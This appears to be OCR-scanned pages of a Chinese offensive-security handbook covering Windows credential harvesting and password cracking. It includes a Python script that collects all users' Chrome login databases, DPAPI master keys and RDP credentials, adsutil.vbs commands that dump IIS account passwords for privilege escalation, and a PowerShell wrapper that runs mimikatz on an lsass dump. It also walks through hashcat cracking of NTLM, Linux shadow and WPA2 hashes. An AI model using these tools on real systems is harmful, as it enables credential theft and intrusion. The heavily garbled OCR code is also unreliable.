4 获取 users 目 录 的 路 径 


print('-' * 50 + '\n' + r'[2] Get all users Google login data files:') 


Google dir = users dir + '\\' + user name + r'NAppDataNLocalNGoogle' 
login data path - search login data(Google dir, name) 
if login data path: 
Ery: 
os.makedirs('./google') 
except Exception as e: 
pass 
dst = './google/{}_login_data'.format(user_name) 
shutil.copyfile(login_data_path, dst) 
print('copy [{}] '.format(login_data_path)) 


login_data_path = '' 


if os.path.isdir('google'): 
shutil.make archive("./google", 'zip', root dirz'./google') 
print('[+] success! google.zip save to {}\pgoogle.zip'.format(os.getcwd( 


shutil.rmtree('./google') 


# 获取 所 有 用 户 的 master key file 
def master key(): 
print('-' * 50 + '\n' + r'[3] Get the master key file for all users:') 
for user name in os.listdir(users dir): 
Protect dir = users dir + 'NN' + user name + r'\AppData\Roaming\Microsof 


if os.path.isdir(Protect dir): 
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shutil.make archive("./protect/(]. protect".format(user. name), LTDA 
root dir-Protect dir) # 每 个 用 户 的 protect 压 缩 为 ust 

print('copy [(J]'.format(Protect dir)) 

os.path.isdir('protect!): 

M make archive("./protect", 'zip', root dirz'./protect') 

rint('[*] success! protect.zip save to {}\protect.zip'.format(os.getcwc 


shutil.rmtree('./protect') 
有 用 户 的 rdp 保 存 凭证 


nt('-' * 50 + '\n' + r'[4] Get RDP save credentials for all users:') 
user name in os.listdir(users dir): 
RDP dir = users dir + 'NN' + user name + r'\AppData\Local\Microsoft\Crec 
if os.path.isdir(RDP dir): 
shutil.make archive("./rdp/() rdp".format(user name), 'zip', root di 


print('copy [{}]'.format(RDP_dir) ) 
os.path.isdir('./rdp'): 
shutil.make archive("./rdp", 'zip', root dir-'./rdp') 
print(r'[+] success! rdp.zip save to {}\rdp.zip'.format(os.getcwd())) 
shutil.rmtree('./rdp') 


gin data() 
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master key() 


rdp() 


read_login_data.exe 用 来 读 取 谷歌 浏览 器 的 链接 ， 用 户 名 和 密码 (密码 需要 解密 ) o 


A filePack.exe 
B read login data.exe 
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a file = sys.argv[1] # Login Data 文 件 名 
= sglite3.connect(Login Data file) 


OF .execute( 'SELECT action url, username value, password value FROM logins') 
each in cursor.fetchall(): 

url, username, password = each 

p int('[{}] [username:{}] [password :需要 解密 ]' .format(url, username)) 

Mith open('./password/() password.txt'.format(username), 'ab') as f1, open(' 


f1.write(each[2]) 


f2.writelines('url: {}\nusername: {}\npassword: \n{}\n'.format(url, user 


> 


1069 


下 图 是 保存 所 有 用 户 谷歌 浏览 器 的 Login Data 压 缩 包 ，login_data 前 缀 是 用 户 名 ， 比 如 是 
administrator 和 test 用 户 


下 图 是 保存 所 有 用 户 的 master key file 压 缩 包 ，protect 前 级 是 用 户 名 ， 比 如 是 administrator 和 test 和 
fskldfn 用 户 


protect 


A 


* Administrator protect.zip 
fskldfn protect.zip 
i test protect.zip 


将 压缩 包 解 压 后 ， 使 用 read loign data.exez&isiBXlogin data 文 件 。 
此 处 以 test 用 户 举 例 
此 处 是 将 test 用 户 的 谷歌 浏览 器 内 容 读 取出 来 。 









， 434553 





因为 不 是 当前 用 户 ， 所 以 密码 是 密 文 需要 解密 。 密 文 密码 保存 在 当前 目录 的 password 目 录 下 


password 


A 


admin password.txt 
root password.txt 


url user pwd.txt 


_password.txt 前 缀 是 谷歌 浏览 器 每 个 链接 的 用 户 名 
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一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


Wpr 工 具 解 密 每 个 _password.txt， 下 载 地 址 : 


.passcape.com/index.php?sectionzdownloads&category-28 


^ " DPAPI Decoder and Analyser -> Decrypt DPAPI data blob 


有 





| D | 1 re 
| ad = 
LSA Secrets Domain Cached Active Directory SAM @@PAPI Dec Windows Windows Hello 


Dumper Credentials Explorer Explorer Expléfer and Analyser Vault Explorer. 
ikea ® Decrypt DPAPI data blob 
一 
7 Analyze DPAPI data blob | 
$ 


Search for DPAP! Blobs i T 7 j 





Explorer " 











LM password NT password ] Analyze User Master Key | | NT ha: 
500 $ «Empty» Aal«DEMO | 9]. Dump CREDHIST Hashes 47BF8 
503 @ «Empty» y «Empty» A Analyze CREDHIST File 
501 «Empty» $ «Empty» - 
1002 «Empty» tes«DEMO V... OCB6S 
tilityAccount 504 a «Empty» i 7FC21 


d PI blob fle 指 向 上 述 步骤 生成 的 test 用 户 的 txt 文 件 ， 然 后 点 击 下 一 步 


b 
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Step 1/4 


password 
+ * 
名 "m | UPAPI blob is an opaque data structure that holds encrypted data Many system components such as Encrypting | 
File System, Wireless connection wizard, Windows Credentials Manager, CardSpace, eto. and popular 






applications such as Internet Explorer, Windows Mail, Outlook, Skype, Google Talk uses DPAPI to secure] 
store their PRS passwords S sensitive data in DFAPI blobs. You can extract DPAPI blobs using wt 


root password.txt search’ utility 


url user _pwd.txt 


nforestiss 





flix 





Select DPAP! bidb file 


EAUser s\Administrator\Desktop\filePack\password\admin_password.tat 





ws dir CAWindows 


RE ZH 


POD > 





设置 Master Key File 指向 test 用 户 的 master key 


nE su 


FlePack 


1.5.21-268547241.550877389.1596 Marter Key is used in DPAPI ax e pimary cypher key to decrypt user protected data and passwords (i e DFAIT 
blobs). For example, EFS certificates, WiFi, MSN, Outlook. Internet Explorer, Skype credentials, eto User 
Master Key file iz located at the WAPPDATAWUficrozoftiProtectiWGIDW folder. Where SAPFDATAS is the user 
application data directory, and WGIDW is the textual SID of the user. However SYSTEM Master Key may be 
located at the following folder  WINDIMWASysten32 Uli croselt Protect 








0-9d85-45db-8578-d79304e... 
Preferred 





Select Master Key fi 


Master Kuy file 241-550877380-1595514071-100212 1670320-9480-45db-8578-d79304ec?d 16] 


CAUsers\Administrator\AppData\Roaming\ Microsoft Protecticcedhist 


3 How do you want the MasterKey to be decrypted? 
FD) CPBA XG4FRE Zi 


xt BA 
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| 7 


Master Key location 
ey Step 2/4 


in DPAPI as a pimary cypher key to decrypt user protected data and passwords (i.e. DPAP 

L EFS certificates, WiFi, MSN, Outlook, Internet Explorer, Skype credentials, etc. User 
|is located at the WAPPDATAWUficrozoftiProtect|XSIDW folder. Where SAPPDATA® is the user 
| directory, and SSID% is the textual SID of the user. However SYSTEM Master Key may be 
ing folder: WINDIRW|Systen32 Uli crosoft\Protect. 


| Windows Password Recovery a | 

| 
Pp I CREDHIST GUID does not correspond to the - z 5 
andati . Master Key specified. Continue anyway (not B07 dt9 
recommended)? 


有 户 的 上 明文， 点击 下 一 步 ， 选 择 确定 
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2PAPI offline decoder 


è ` 
- m * 


ah) 
to ge User/system credentials needed for successful blob decryption 





Step 3/4 


You should specify user SID and user logon password here in order to decrypt the DPAPI encrypted data 
However some DPAPI encrypted blobs, eg. encrypted using SYSTEM account, require machine credentials. In 
this case, you ll have to provide a path to 4 SYSTEM and SECURITY registry files. Optional entropy file 
ix required when the blob was was created using entropy (refer to CryptProtectData API for more 


information), You should manually create a simple binary file with the entropy data and show the program 
path to the file 


Additional parameters are required in order to proceed the data decryption 


User SID $-1-5-21-368547241-550877389-1596514071-1002 


User logon passwor d test 


Entropy file 
fontional) 


成 功 读 取 到 密码 ， 该 密码 就 是 下 面 链接 对 应 的 密码 。 


url: http://192.168.1.3/DVWA-master/login.php 
username: admin 


password: 
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J Decrypted DPAPI blob Step 4/4 


d 


contains decoded data of the DPAPI blob file. Right-click the list to display the context 
C:\Users\Administrator\Desktop\filePack\test_login_data.txt 


C:\Users\Administrator\Desktop\filePac...\21e70320-9d80-45db-8578-d79304ec7d19 


61 73 73 77 GF 72 64 Bassword 


去 读 取 root 账 号 对 应 的 密码 ! 


, 
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Windows2003 获 取 密 码 之 adsutil.vbs 
1. 简介 


Adsutil.vbs 是 什么 ? 它 是 Windows2003 的 lIS 服 务 自 带 的 基于 命令 行 下 的 lIS 管 理 脚 本 ， 位 
于 %SystemDrive%InetpubAdminScripts 目 录 下 ，95，426 字 节 。 


C:\Inetpub\AdminScripts\adsutil.vbs 
C:\WINDOWS\system32\cscript.exe 


C:\WINDOWS\system32\inetsrv\MeatBase. xml 










XEO 编辑 区 ) SEV 收藏 和 ) IAO HHW 
DRE > DF) 人 搜索 o xx x | 


Het QD [co C:\Inetpub\AdminScripts -j > 转 到 


S| TETT vbs | 84 KB VBScript Script 2007-2-17 6:42 
id] syncivan vbs 6 KB VBScript Script 2003-2-21 16:48 AC 









































33.5 软盘 A) 
: - jj K 
XO) REE) SEW HRW IAD WR) i 
了 了 后退 ~ 4 搜索 THE X xw) m 
HE QD | > c WIND eyiten22 =) oj) Be 
PER x 
i 2 a amt 
* 我 的 文档 
- 4 Emus 
* 358g 0) 
= se EHE C) s K case 1 
ADRS ai 35 SREFFE AC 
+ c3 Documents and Set à eryptnet dll Sli GRRSre A 
EN Files A cryptsve. dil Si SRBSre A 
* (23 Inetpub 313 RRRSSTeR A 
* CI Javafeb 98 EB EB A 
* is ERES AC i 
237 GREFFE À 
* 33 y» ”应 用 程序 扩展 
= 4 KE 应 用 程序 A 
72 EB 8 i 
: 45 XP 应 用 程序 AC 
š ISB AREF A 
oe zm AREFE a 
zs 750 SBHEFR ic 
= Z » SK» MS 文件 aC 
25e FREF A 
— 食用 程序 扩展 c 
s I EBBEPR * 
iib 点 用 程序 扩展 AC 
s 1 应 用 程序 扩展 AC 
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\inetsrv 

























Sj iisuicbj. dl 55 kB ERES E 2001-3-1 20:00 
A)iisutil dll 184 EB EEBEFE 2007-3-7 20:00 
Aiisw3ade dll 212 和 还， 应 有 程序 扩展 2007-3-7 20:00 
Miisesi. dl 155 B RRBRTE 2007-3-7 20:00 
yineting£o. exe 14 B BRR 2007-3-7 20:00 
Aj inetagr. dll S11 RERSTR 2007-3-7 20:00 
s inetmer. exe 19 kB RRB 2007-3-7 20:00 
S) infocoas. dll 23:0 © 应 用 程序 扩展 2007-3-7 20:00 
Alisspips.dll 8x5 HRBATR 2007-3-7 20:00 
Misate dll i ”应 用 程序 扩展 2006-5-27 4.45 
Ajiscoalog. dll 19 E ”应 用 程序 扩展 2007-3-7 20:00 
Sjlogserpt. dil 25 XB. 应用 程序 扩展 2007-3-7 20:00 
Ay logtenp. sql 1 KB Microsoft SQL S 2006-5-21 4:46 
A)1ogui ocx 64 KB ActiveX BE 2001-3-1 20:00 
S)lonsint. d1 1338 应 用 程序 扩展 2007-3-7 20:00 
SÍNESchema bin 00000000h 795 KB 00000000 文件 2018-11-15 21:00 


1 =) adeinistrat 
— £3 Cache 
BG Catioot 
- E 3 CatRoot2 
i] © certsrv 
Ms E clients 
e ce 
© config 
















”六 


8 C3 corebins 258 KB XML 文档 2018-11-15 21:00 
i 3 66 Kb INL 文档 2019-4-25 21-14 
Ajaetadsta a 230 SEBREFER 2007-3-7 20:00 
Mnextlink dll sors BERBER 2007-3-7 20:00 
GS export Sinntpade dl 12 I ”应 用 程序 扩展 2007-3-7 20:00 
a 
E E GroupPolicy 六 smtpsnap dl 2,5500 B 应 条 程序 扩展 2007-3-7 20.00 
E. M rneref ai sh SERETER ?nni-3-1 M-N 









.vbs 放 到 C:\WWINDOWS\system32\inetsmM 目 录 下 


ND OWS\system32\inetsrw 目 录 下 执行 : 


4 


IDOWS\system32\inetsrv>cscript.exe adsutil.vbs get W3SVC/anonymoususer pass 


soft (R) Windows Script Host Version 5.6 
q 
H(C) Microsoft Corporation 1996-2001。 保 留 所 有 权利 。 


(STRING) "m4YIw3:zwnC9CA" 


t.exe c:\windows\tapi\adsutil.vbs get MSFTPSVC/anonymoususerpass 
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JOWS \syste Sript, exe adsutil.vbs get anonymoususer 
(R) Windc Version 5.6 
Microsoft Corporation 1: 2001. (RHPA SON. 


ING) ^ sks 


adsutil.vbs get V 
n 5.6 
-2001. 保留 所 有 权利 。 





ING) "m4YIw3:zW 





2. 教程 


使 用 方法 : 
获取 IUSR 帐户 密码 


cscript.exe adsutil.vbs get w3svc/anonymoususerpass 


获取 IWAM 帐户 密码 


cscript.exe adsutil.vbs get w3svc/wamuserpass 
设置 IUSR 帐户 密码 

cscript.exe adsutil.vbs set w3svc/anonymoususerpass "password" 
设置 IWAM 帐户 密码 


cscript.exe adsutil.vbs set w3svc/wamuserpass "password" 


注 : 在 获取 密码 的 时 候 如 果 现 实 的 结果 密码 为 ****** ， 那 么 应 当 修改 Adsutil.vbs 文 件 
将 


代码 


If (Attribute = True) Then 


IsSecureProperty = True 
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- True 


ureProperty - False 


帐户 密码 cscript.exe adsutil.vbs get w3svc/anonymoususerpass 

帐户 密码 cscript.exe adsutil.vbs get w3svc/wamuserpass 

USR 帐户 密码 cscript.exe adsutil.vbs set w3svc/anonymoususerpass "passwor 
帐户 cscript.exe adsutil.vbs set w3svc/anonymoususername "userna 
帐户 密码 cscript.exe adsutil.vbs set w3svc/wamuserpass "password" 


帐户 cscript.exe adsutil.vbs set w3svc/WAMusername "username" 


: Windows NT 4.0 中 尝试 获取 密码 时 ， 密 码 显示 为 明文 ; 但 在 Windows 2000 中 ， 密 码 显 
号 。 若 要 在 Windows 2000 中 也 让 密码 显示 为 明文 ， 必 须 修改 Adsutil.vbs， 使 它 显示 明码 。 
请 按照 下 列 步骤 操作 ; 


记事 本 "中 ， 打 开 Adsutil.vbss 
缉 " 荣 单 上 ， 单 击 “ 查 找 "， 键 入 lsSecureProperty = True， 然 后 单 击 "查找 下 一 个 ”。 
IsSecureProperty = True" 更 改 为 "IsSecureProperty = False"; 


Ht Adsutil.vbs 所 做 的 更 改 ， 然 后 关闭 “记事 本 "。 
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m LÀ 


Adsutil.vbs START SERVER W3SVC/1 /7 启动 第 一 个 虚拟 WEB 站 点 。 


Adsutil.vbs ENUM /P W3SVC // 查 看 IIS 的 所 有 站 点 。 


3. 实战 
3.1 默认 账号 密码 


这 些 都 是 默认 的 


w3svc/anonymoususerpass w3svc/wamuserpass 


cscript.exe adsutil.vbs get w3svc/anonymoususerpass 
Microsoft (R) windows Script Host Version 5.6 


Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. 


anonymoususerpass CSTR NG Ra A 


注意 ; 在 Windows NT 4.0 中 党 试 获取 密码 时 ， 密 码 显示 为 明文 ;) 但 在 Windows 2000 中 ， 密 码 显 
示 为 星 号 。 若 要 在 Windows 2000 中 也 让 密码 显示 为 明文 ， 必 须 修 改 Adsutil,vbs， 使 它 显 示 明 码 。 
为 此 ， 请 按照 下 列 步骤 操作 : 


1. 在 “记事 本 "中 ， 打 开 Adsutil.vbs。 
2. 在 “编辑 " 荣 单 上 ， 单 击 ' 查 找 "， 键 入 lsSecureProperty = True， 然 后 单 击 “ 查 找 下 一 个 ”。 





3. Y&"IsSecureProperty = True" $BPA7j"IsSecureProperty = False"; 


4. 保存 对 Adsutil.vbs 所 做 的 更 改 ， 然 后 关闭 "记事 本 "。 
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: (STRING) "u4Ccp6Io^X3^V3" 


: (STRING) "wj^&m24K5tt"XO" 






id util.vbs 文 件 所 在 路 径 


pub\AdminScripts\adsutil.vbs 


权限 下 获取 管理 员 的 账号 密码 ， 从 而 达到 提 权 。 


WINDOWS\system32\inetsr 人 AMetaBase.xml 查 找 username, 获 取 Location 的 值 
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dee 


" > 
<IIsWebVirtualDir Location ="/LM/W3SVC/710823/root" 


AccessFlags-"AccessRead | AccessWrite | AccessScript" 
AccessSSLFlags="0" 
AnonymousUserName="administrator" 


AnonymousUserPassz"496344627000000022000000400090009b211fd42028e5588a46c 


命令 如 下 : 


cscript.exe adsutil.vbs get .../anonymoususerpass 
… 是 /LM 后 面 的 参数 值 ， 例 如 人 LM/W3SVC/710823/root， 那 么 就 是 W3SVC/710823/root 


执行 效果 如 下 : 


cscript.exe adsutil.vbs get w3svc/710823/root/anonymoususerpass 
Microsoft (R) Windows Script Host Version 5.6 


Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. 


anonymoususerpass : (STRING) "NXXXXC ! QXXXX40" 
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条 件 : 1、 
ge. ARRAT 
mimikatz.exe 
Gidecrypt\rdp' 











获 到 目标 的 rdp 凭 证 和 lsass.d mp 


EENEIG) > decrypt ^ rdp ^ Administrator rdp 
^ zr 


| 6D46740; 16! 

|] 8B117A6 ^ 4E5* 

[3 47AAGEF 36 

[1066758 “Eat 
B onsosr.-oc wc 
| C784 

E] CFE2-?EE73t 

|. DFBE70A7ESCC A398 


lsass.dmp 





RDP:Decrypt.ps1 与 mimikatz.exe 在 同 目录 下 
ü 


TA 7. AMSAT  sEARIB > Mimikatz > alpha 


hiv.bat 


Isass.bat 







| mimidry.sys 
Q mimikatz.exe 


; mimilib.dll 


—-^ 


rdp.bat 





fimikatz\alnha\x64> 
RvA: E 39 


target-TERMSR 





1083 


xb4 


. \RDP-Decrypt. psi -folder path ¢:\decrypt\rdp\Administrator_rdp 





代码 
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tring]$folder path) # 列 出 目录 下 的 文件 


+e è # p 
1dItem $folder path | ForEach-Object -Process{ # 注意 : { 必须 
$ -is [System.IO.FileInfo]) # 如 果 想 要 得 到 3 
"$credential path = $folder path + '\' + $ .name; # RDPUEB XI 


-$ Write-Host mimikatz.exe privilege::debug "dpapi::cred /in:$credential_ 
- $guidMasterKey cred - cmd /c mimikatz.exe privilege::debug "dpapi::cred 
-for($i-0;$i -lt $guidMasterKey cred.Length; $i++){ 
if ($guidMasterKey_cred[$i] -like '*guidMasterKey*'){ 

# $MasterKey = $dpapi[$it+2].Split(":")[1].Trim(); 

$guidMasterKey = $guidMasterKey_cred[$i].Split(":")[1].Trim(); 


4 $guidMasterKey value = $guidMasterKey.Split("{}")[1] # 通过 分 割 获取 6 


~» #Write-Host mimikatz.exe "sekurlsa::minidump $folder_path\lsass.dmp" "se 
DE # $dpapi = cmd /c mimikatz.exe privilege::debug sekurlsa::dpapi exit; 
F $dpapi = cmd /c mimikatz.exe "sekurlsa::minidump $folder_path\lsass.dmp" 
for($i=0;$i -lt $dpapi.Length; $i++) { 
if ($dpapi[$i] -like '*'«$guidMasterKey value*'*')( 

$MasterKey = $dpapi[$i+2].Split(":")[1].Trim(); 

# Write-Host $MasterKey; 


# Write-Host mimikatz.exe privilege::debug "dpapi::cred /in:$credential_ 
$cred = cmd /c mimikatz.exe privilege::debug "dpapi::cred /in:$credentie 
for($i=0;$i -lt $cred.Length; $i++){ 
if($cred[$i] -like '*TargetName*'){ 
$TargetName = $cred[$i]; 
} 
if($cred[$i] -like '*UserName*'){ 
$UserName = $cred[$i]; 
} 
if($cred[$i] -like '*CredentialBlob*'){ 
$CredentialBlob = $cred[$i]; 


} 

Write-Host $TargetName; 
Write-Host $UserName; 
Write-Host $CredentialBlob; 
Mate Host '-------------=-------=--------- A ; 
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X 


cat 破解 Hash 神 器 详解 
| at 破解 Hash 神 器 详解 


活 过 程 中 ， 会 得 到 各 类 Hash， 但 是 没有 明文 密码 。 对 于 大 多 数 情况 下 ， 这 样 的 hash 会 让 攻 
而 止 ， 转 而 寻求 其 他 方面 进行 后 续 的 渗透 。 内 网 的 hash 种 类 很 多 ， 有 包括 早期 Windows 使 用 
ash . NTLM-Hash 、Linux 中 /etc/shadow/ 的 SHA-256 / SHA-512 亦 或 者 Wordpress 


加 盐 密码 ( MD5 ) 等 等 ， 对 于 这 些 Hash 都 有 着 明确 的 加 密 方式 ， 针 对 加 密 方式 进行 逆向 的 
村 是 二 种 非常 有 效 的 攻击 手段 ， 如 果 能 够 得 到 密码 ， 相 信和 后续 的 攻击 会 轻松 很 多 。 破 解 Hash 
9 非常 多 ， 首 推 就 是 Hashcat。 


a 是 世界 上 最 快 的 密码 破解 软件 且 是 唯一 一 个 支持 内 核 规则 引擎 ， 跨 平台 、 可 串联 多 台 设 
持 GPU、 资 源 占用 率 低 等 特点 。 到 目前 为 止 可 破解 多 大 200+ 类 算法 ， 几 乎 市 面 上 所 有 的 加 密 


得 到 了 支持 。 


PU 进行 破解 密码 时 要 注意 驱动 程序 的 要 求 : 
in X 上 的 AMD GPU 需要 Radeonopencompute (Rocm) ”软件 平台 (1.6.180 或 更 高 版 本 ) 


indows 上 的 AMD GPU 需要 AMD Radeon Software Crimson Edition (15.12 或 更 高 版 


Mel CPU 需 要 适用 于 Intel Core 和 Intel Xeon 处 理 器 的 opencL 运行 时 (16.1.1 或 更 高 版 本 ) 
nux 上 的 英特尔 GPU 需 要 适用 于 Linux 的 opencL 2.0 GPU 驱动 程序 包 (2.0 或 更 高 版 本 ) 
Nindows 上 的 Intel GPU 需要 适用 于 Intel Iris 和 Intel HD Graphics 的 opencL 了 驱动 程序 


NVIDIA GPU 需要 NVIDIA 驱 动 程序 (367.x 或 更 高 版 本 ) 


hdows 下 安装 运行 
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Windows (Windows 7/10 为 例 ) 选择 最 新 版 ,7z 文件 


a ` 
. > 
https://github.com/hashcat/hashcat/releases 
hashcat v5.1.0 
© v5.1.0 
M jsteube released this on 2 Dec 2018 - 1243 commits to master since this release 
© 7231987 ws 


Welcome to hashcat 5.1.0 release! 
This release is mostly about expanding support for new algorithms and fixing bugs. 
Thanks to everyone who contributed to this release!!! 


Full changelog: https://hashcat.net/forum/thread-7983.html 


* Assets 3 


C hashcat-5.1.0.72 2.68 MB 
D Source code (zip) 


E) Source code (tar.gz) 
下 载 完 解压 文件 ， 命 令 行 下 做 一 次 测试 
.\hashcat64.exe --benchmark 


Linux/OS X 下 安装 运行 


Mgithub.E Fk 


$ git cione https://github.com/hashcat/hashcat.git 
解压 & 编 译 安装 

$ cd hashcat 

$ sudo make 


$ sudo make install 


$ ./hashcat --benchmark 


1088 












à LJ 


- : * 


CEE, ITUSEHREN, IA ATHBATEIUEGRITNUSRUB A5 o1 
疝 ， 几 个 指令 就 可 以 让 Hashcat 对 Hash 进 行 暴 力 破 解 


击 类 型 分 为 5 种 ， 分 别 是 : 
KAI | 解释 | 


| 使 用 外 部 加 载 的 字典 进行 破解 ， 效 率 根据 字典 大 小 而 定 。| 
| 多 字典 组 全 破解 | 

击 | 利用 自 定义 掩 码 暴力 破解 

MADRAN 

码 + 字典 | 混合 破解 


持 高 达 200+ 种 hash 破 解 功 能 ， 我 们 要 做 的 就 是 找到 对 应 的 Hash 类 型 就 可 以 。 












B 一 款 工具 Hash Algorithm Identifier ， 如 果 不 知道 得 到 的 Hash 是 什么 类 型 的 ， 可 
开具 来 识别 。 同 时 也 可 以 在 github 下 载 ， 使 用 说 明 请 参考 : Hash Algorithm Identifier: 一 


N 
d E 
HN 


IA 


hash 值 |hash 文 件 |wifi 包 [字典 | 掩 码 | 目录 ] 


中 ， 无 论 是 本 地 的 内 存 转 储 还 是 域 的 NTps ,dit 中 都 存在 着 一 定 的 LM-Hash 和 NTLM- 
而 在 操作 系统 Windows 2012 server 之 后 (包含) 内存 转 储 中 是 不 保存 明文 密码 的 ， 使 用 
P VERE, 


AHX NTLM-Hash 





1089 










RID 000003e8 (1000) 
User * user 

Hash NTLM: 32ed87bdb5fdc5e9cba88547376818d4 
。 使 用 字典 对 其 进行 破解 






hashcat -a 0 -m 1000 32ed87bdb5fdc5e9cba88547376818d4 ./dic 


使 用 字典 对 NTLM-Hash 进行 破解 ， 其 Hash 类 型 编号 是 1000 
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ed87bdbSfdc5e9cba88547376818d4 ./ john. txt 


R) CoreTM): i7-9750H CPU e 2.60GHz, skipped. 
Intel(R) UHD Graphics 630, 384/1536 MB allocatable, 24MCU 
AMD. Radeon Pro 555X Compute Engine, 1024/4096 MB allocatable, 12MCU 


je ; 4 unique digests, 1 unique salts 
s, 65536 entries, Gx0000ffff mask, 262144 bytes, 5/13 rotates 


rd length supported by kernel: @ 


monitoring interface not found on your system. 
re-abort trigger disabled. 


Jc 


> hashcat 
t Cracked 


32ed87bdbSfdcSe9cba88547 37681844 
t Wed Jul 24 11:09:47 2019 (9 secs) 
t Wed Jul.24 11:09:47 2019 (0 secs) 
: File C. /john. txt) 
: 1/1 (100. 00%) 
900.8 kH/s (0.22ms) € Accel:64 Loops:1 Thr: 64 Vec:1 
31815 H/s (0.46ms) € Accel:1024 Loops:1 Thr:64 Vec:1 
932.6 kH/s 
: 1/1 (10@.00%) Digests, 1/1 (100.00%) Salts 
; 3107/3187 (100 .00%) 
1 Q/3107 (@,00%) 


这 人 Hash 对 应 的 密码 比较 简单 ， 仅 作为 演示 ， 下 文 会 分 享 多 个 基于 各 类 型 的 字典 包 


BARRE Hash ig ABH 卖 进 行 破解 ， 会 记录 在 根 目 录 下 的 hashcat.potfile 文件 中 ， 使 用 -- 
Show 可 以 打印 


zhasheot -a @ -m 1000 32ed87bdbSfdcSe9cba88547376818d4 ©. / john. txt --show 





暴力 破解 SHA-512 


首先 获取 /etc/shadow 文件 下 的 root 密 码 Hash: 


Lir/home# cat /etc/shadow 





root:$6$Juh53B70$ft/aqSbCckAnmGxkknxX2noLoGMxo39wqaTSpe1BDl2MVa800NtoOpYPOJOSF2VnKLGW. YUIi8HeEd/SN48Zf /:18099:0:99999:7... 


使 用 Hash Algorithm Identifier 识别 这 段 Hash 的 类 型 





简单 对 Linux 加 密 的 Hash 进 行 讲 解 : 


$6$Juh53B70$ft/aqSbCckAnmGxkknxX2noLoGMxo39wqaT5pe1BDl12MVa800NtoOpYPO JO5F2VnKLGW 
. YUI18HeEd/SNA48Zf/ 


将 该 Hash 分 成 三 段 ， 以 字符 $ 进行 分 割 


$6$ 表示 加 密 的 方式 ， 有 1、5、6 分 别 表示 MD5、SHA-256、SHA-512 
Juh53B70$ ”该 段 表示 盐 值 (Salt) ， 使 用 随机 字符 码 混合 密码 加 密 算法 所 产生 的 密码 。 


$t/agSbCckAnmGxkknxX2noLoGMxo39wqaT5pe1BD12MVa800NtoOpYPOJ05F2VnKLGW. YUTi8HeEd/s 


d 


接 下 来 使 用 Hashcat 对 其 进行 解密 


./hashcat -a 0 -m 1800 linux.hash john.txt -D 1 


命令 行 下 可 能 有 特殊 字符 的 原因 ， 我 们 将 上 述 Hash 存 放 在 linux.hash 文 件 中 ， -D 1 调用 CPU 设备 
进行 运算 破解 
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./hashcat =a 0 -m 1800 Linux hash ohni txt -D 1 


ng 
Apple 


(RO Core(TM) 17-9750H CPU & 2.60GHz, 8192/32768 MB allocatable, 12MCU 
t 2) UHD Graphics 630, skipped. 
AMD Radeon Pro 555X Compute Engine, skipped. 


s; 1 unique digests, 1 unique salts 
s, 65536 entries, Ox000Qffff mask, 262144 bytes; 5/13 rotates 


supported by kernel: 0 
oported by kernel: 256 


iGxkknxX2noLoGMxo39waal Spel BDLZMVa800NtoOpYPOJOSF2VnKLGW. YUTi8HeEd/sN48Zf 


: hashcat 
. Cracked 
: shaSl2crypt $6$, SHA512 (Unix) 
.: $6$Juh53B70$Ft/agSbCckAnmGxkknxX2noLoGMxo39wqaT Spel. ..N48ZF/ 
: Wed Jul 24 14:21:00 2019 (1 sec) 
: Wed Jul 24 14:21:01 2019 (0 secs) 
..2 File Cjohn. txt) 
: 1/1 (100. 00%) 
: 2218 H/S (8.64ms) € Accel:128 Loops:64 Thr:1 Vec:2 
1/1 (100.00%) Digests, 1⁄1 (100:00%) Salts 
1536/3107 (49.44%) 
8/1536 (0.00%) 
7 (0.00X) 
Amplifier:0-1 Iteration:4992-5000 
» Creative 


0:59 2019 
:02 2019 


做 用 字典 解密 ， 速 度 基于 字典 包 的 大 小 和 设备 的 运算 能 


暴力 破解 WPA2-WIFI 密 码 


出生 窗 码 的 破解 需要 一 些 前 置 的 说 明 ， 首 先是 抓 取 WIFI 包 ， 推 荐 使 用 CDLinux 配 合 WI-FI 接 收 器 抓 
B, 效率 杠 杠 的 ， 参考 : 


名 上 六 文章 中 人 用 CDLinux 自 带 的 字典 进行 破解 ， 效 率 和 成 功率 上 有 待 商 检 ， 建 议 将 .cap X 
REREH Hashcatik ig 





test.cap 


使 用 Hashcat 破 解 ， 首 先 需要 将 .cap 文件 类 型 转换 成 .hccapx ,官网 自 带 转换 : 0 


test.hccapx 


接 下 来 进行 破解 ， 先 找到 对 应 的 Hash 类 型 编号 2500 


./hashcat -a 0 -m 2500 test.hccapx john.txt 
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eno 


-a 0 -m 2500 t hccapx john.txt --show 
d746c56b59: $ 





破解 成 功 之 后 会 显示 WIFI 名 和 密码 。 
此 包 为 实战 环境 中 抓 取 的 wifi 包 ， 已 进行 脱 敏 处 理 。 
宣 友 是 我 之 前 已 经 跑 出 来 的 ， 这 里 只 将 正确 密码 放 入 字典 中 作为 演示 。 


进 阶 技巧 


以 进 阶 命名 其 实 是 个 伪 命 题 ， 只 是 更 加 复杂 的 Hashcat 使 用 方法 ， 它 的 复杂 之 处 也 是 自由 度 的 展 
峙 于 名 以 自 定制 破解 方法 ， 破 解 模式 ， 破 解 规则 以 及 破解 效率 ， 


掩 码 规则 


MARHE? 举 个 例子 ， 比 如 你 认为 得 到 的 hash 密 码 应 该 是 六 位 ， 从 1-6 位 都 不 知道 是 什么 明确 的 
宝 符 那么 就 需要 六 位 掩 码 占 位 进行 破解 ?a7a2a?a?a?a 。 如 果 你 知道 前 五 位 是 Admin ， 最 后 一 
位 不 知道 ， 那 么 使 用 掉 码 就 应 该 是 Admin?a ， ?a 表示 键盘 上 所 有 字符 。 


ES frr Las, 不 一 定 是 ?a 键盘 上 所 有 字符 。 


1095 


内 置 掩 码 规则 
|? | 撞 码 | 解释 
Vesp] 

| | abcdefghijklmnopqrstuvwxyz|/J v5 ZĘ 

u | ABCDEFGHIJKLMNOPQRSTUVWXYZ|X' 5 E BE 
d | 0123456789| 纯 数字 

h | 0123456789abcdefl 常 见 小 写字 母 + 数字 

H | 0123456789ABCDEF| 常 见 大 写字 母 + 数 字 

s | "4$96&'(**,-./;«-»?Q[J^ ([- | 特殊 字符 

a | ?1?u?d?s| 键 盘 上 所 有 字符 

b | 0x00 - 0xffl 可 预见 的 类 似 空格 等 特殊 字符 


示例 : 


217171717171 # 6 位 小 写字 母 
?d?d?d?d?d?d?d?d # 8 位 纯 数字 


